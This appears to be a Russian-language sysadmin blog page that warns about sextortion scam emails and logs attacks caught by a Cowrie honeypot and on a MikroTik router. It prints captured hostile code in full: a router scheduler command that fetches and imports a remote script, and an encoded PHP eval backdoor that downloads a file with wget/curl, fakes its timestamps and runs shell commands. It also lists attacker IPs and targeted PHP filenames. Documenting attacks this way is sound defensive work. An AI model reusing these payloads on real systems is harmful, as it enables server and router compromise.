Если Вам пришло подобное письмо, сообщение в соц сеть или мессенджер! Не ведитесь это мошенники !

100% Разводилово.

В противном случае должно быть какое-либо доказательство сказанного, а это обычный шаблон рассылка рассчитаное на лох0FF.

Пример письма

Здравствуйте!

Думаю Вас не очень обрадует то, что вы увидите дальше.
Дело вот в чём: через ваш роутер я подключился к вашей сети. Далее Я нашёл брешь в операционной системе вашего компьютера и залил свой код. Во всём виновата ваша любовь к жёсткой порнушке.

Читать дальше

Это перехваченные команды хацкеров через HONEYPOT COWRIE

ВВДИТЬ И ИСПОЛНЯТЬ ИХ НЕЛЬЗЯ! Ну если только очень хочется.)

Перехват хакерских команд через эмулятор терминала SSH cowrie honeypot.

Микротиковский замес

/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://gamedate.xyz/poll/b94cc680-52b5-4c5a-92f0-37f0a1307729 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write,1

и далее
Читать дальше

Ботнет 92.63.194.0/24 GRE

Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24

Что он делает?

Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.

Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157

Что делать?

Сперва добавлять нижеприведённые правила и шиться последней прошивкой.

/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

А вот список файлов в которые пытаюся впихнуть гадкий код с помощью POST запросов

417.509.php
accept.client.php
accept.json.php
accepted.sess.php
accepted.tools.php
assets
bad.except.php
body.work.php
code.sessions.php
conflicts.link.php
content.img.php
cookie.media.php
data.using.php
database.class.php
database.http.php
exception.config.php
exceptions.throw.php
exceptions.work.php
fail.lib.php
Читать дальше

А вот ip адреса прокси серверов которые используются для атак на движки сайтов

Порты конечно же не указываю так как я не распространитель инфы об актуальных прокси листах, а просто собрал атаки с этих адресов
Список прокси
1.10.207.236
1.2.188.5
1.20.227.241
101.108.96.117
101.109.102.58
101.50.1.2
Читать дальше

Уроды которые ломают движки сайтов краткий список ip адресов

100.101.32.64
100.102.57.0
100.106.68.64
100.108.113.64
100.118.156.0
100.123.159.128
100.125.196.64
Читать дальше

Ну очередной эксплоит пытаются засодить уроды с айпи 193.106.30.99

ВОт код

eval(rawurldecode("%20%20%20error_reporting%28E_ALL%29%3B%20%24p%20%3D%20%22DOCUMENT_ROOT%40%7B%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%7D%22%3B%20%24url%20%3D%20%27http%3A//193.106.30.99/tmp/1572027015TQK.txt%27%3B%20%24root%20%3D%20FALSE%3B%20if%20%28strpos%28%24p%2C%20%27DOCUMENT_ROOT%40%27%29%20%21%3D%3D%20FALSE%29%20%7B%20%20%20%20%20%24root%20%3D%20TRUE%3B%20%20%20%20%20%24p%20%3D%20substr%28%24p%2C%2014%29%3B%20%7D%20%24f%20%3D%20%27storage.data.php%27%3B%20%24t%20%3D%20%22%24p/%24f%22%3B%20%24dr%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20%20%24t_rel%20%3D%20str_replace%28%24dr%2C%20%27%27%2C%20%24t%29%3B%20%20if%20%28%21file_exists%28%24t%29%29%20%7B%20%20%20%20%20run%28%22wget%20-O%20%24t%20%24url%22%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24t%29%29%20%7B%20%20%20%20%20%20%20%20%20run%28%22curl%20-o%20%24t%20%24url%22%29%3B%20%20%20%20%20%7D%20%7D%20if%20%28file_exists%28%24t%29%29%20%7B%20%20%20%20%20%24ptime%20%3D%20%40filemtime%28%24p%29%3B%20%20%20%20%20%24ftime%20%3D%20%40get_rand_filetime%28%24p%2C%20%24f%29%3B%20%20%20%20%20if%20%28%24ftime%29%20%7B%20%20%20%20%20%20%20%20%20%40touch%28%24t%2C%20%24ftime%29%3B%20%20%20%20%20%7D%20%20%20%20%20%20if%20%28%24ptime%29%20%7B%20%20%20%20%20%20%20%20%20%40touch%28%24p%2C%20%24ptime%29%3B%20%20%20%20%20%7D%20%20%20%20%20%24cpu%20%3D%20request_url%28%29%3B%20%20%20%20%20die%28%22%3Curl%3E%7B%24cpu%7D%7B%24t_rel%7D%3C/url%3E%22%29%3B%20%7D%20die%28%27_save_failed_%27%29%3B%20%20function%20request_url%28%29%20%7B%20%20%20%20%20%24result%20%3D%20%27%27%3B%20%20%20%20%20%24default_port%20%3D%2080%3B%20%20%20%20%20if%20%28isset%28%24_SERVER%5B%27HTTPS%27%5D%29%20%26%26%20%28%24_SERVER%5B%27HTTPS%27%5D%20%3D%3D%20%27on%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24result%20.%3D%20%27https%3A//%27%3B%20%20%20%20%20%20%20%20%20%24default_port%20%3D%20443%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24result%20.%3D%20%27http%3A//%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24result%20.%3D%20%24_SERVER%5B%27SERVER_NAME%27%5D%3B%20%20%20%20%20if%20%28%24_SERVER%5B%27SERVER_PORT%27%5D%20%21%3D%20%24default_port%29%20%7B%20%20%20%20%20%20%20%20%20%24result%20.%3D%20%27%3A%27%20.%20%24_SERVER%5B%27SERVER_PORT%27%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24result%3B%20%7D%20%20function%20get_rand_filetime%28%24dir%2C%20%24sn%29%20%7B%20%20%20%20%20%20%24f%20%3D%20scandir%28%24dir%29%3B%20%20%20%20%20%24regexp_ary%20%3D%20array%28%27/%5C.%28php%7Chtml%7Cjs%29/%27%2C%20%27/%5C.%28js%7Cgif%7Cjpg%7Cjpeg%7Cpng%29/%27%2C%20%27/.%2A/%27%29%3B%20%20%20%20%20foreach%20%28%24regexp_ary%20as%20%24regexp%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28%24f%20as%20%24file%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%3D%3D%20%27.%27%20OR%20%24file%20%3D%3D%20%27..%27%20OR%20%24file%20%3D%3D%20%24sn%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%24regexp%2C%20%24file%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24time%20%3D%20%40filemtime%28%22%24dir/%24file%22%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24time%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%24time%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28%24time%20%3D%20filectime%28%24dir%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24time%3B%20%20%20%20%20%7D%20%20%20%20%20return%20False%3B%20%7D%20%20%20function%20run%28%24in%29%20%7B%20%20%20%20%20%24out%20%3D%20%27%27%3B%20%20%20%20%20if%20%28function_exists%28%27exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%40exec%28%24in%2C%20%24out%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%40join%28%22%5Cn%22%2C%20%24out%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27passthru%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40passthru%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27system%27%29%29%20%7B%20%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20%20%40system%28%24in%29%3B%20%20%20%20%20%20%20%20%20%24out%20%3D%20ob_get_clean%28%29%3B%20%20%20%20%20%7D%20elseif%20%28function_exists%28%27shell_exec%27%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20shell_exec%28%24in%29%3B%20%20%20%20%20%7D%20elseif%20%28is_resource%28%24f%20%3D%20%40popen%28%24in%2C%20%22r%22%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%24out%20%3D%20%22%22%3B%20%20%20%20%20%20%20%20%20while%20%28%21%40feof%28%24f%29%29%20%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3D%20fread%28%24f%2C%201024%29%3B%20%20%20%20%20%20%20%20%20pclose%28%24f%29%3B%20%20%20%20%20%7D%20%20%20%20%20return%20%24out%3B%20%7D%20"));'

РАСШИФРУЕМ и
Читать дальше

Ботнет-майнинг Monero,

предназначенный для серверов Redis и OrientDB, заразил почти 4400 серверов и с марта 2017 года добыл Monero на сумму более 925 000 долларов.

Ботнет, названный DDG на основе одного из своих модулей, нацелен на серверы Redis с помощью атаки методом перебора словаря учетных данных; и базы данных OrientDB, используя уязвимость CVE-2017-11467 для удаленного выполнения кода.

«[DDG] стремится к серверам баз данных, поскольку серверы баз данных, как правило, оборудованы с большим количеством ЦП и памяти, а это значит, [они] более мощных горных машин,» сказал Ли Fengpei, исследователь безопасности с командой Qihoo 360. NetLab Bleeping Компьютер вчера.

Читать дальше

На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo
ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

Читать дальше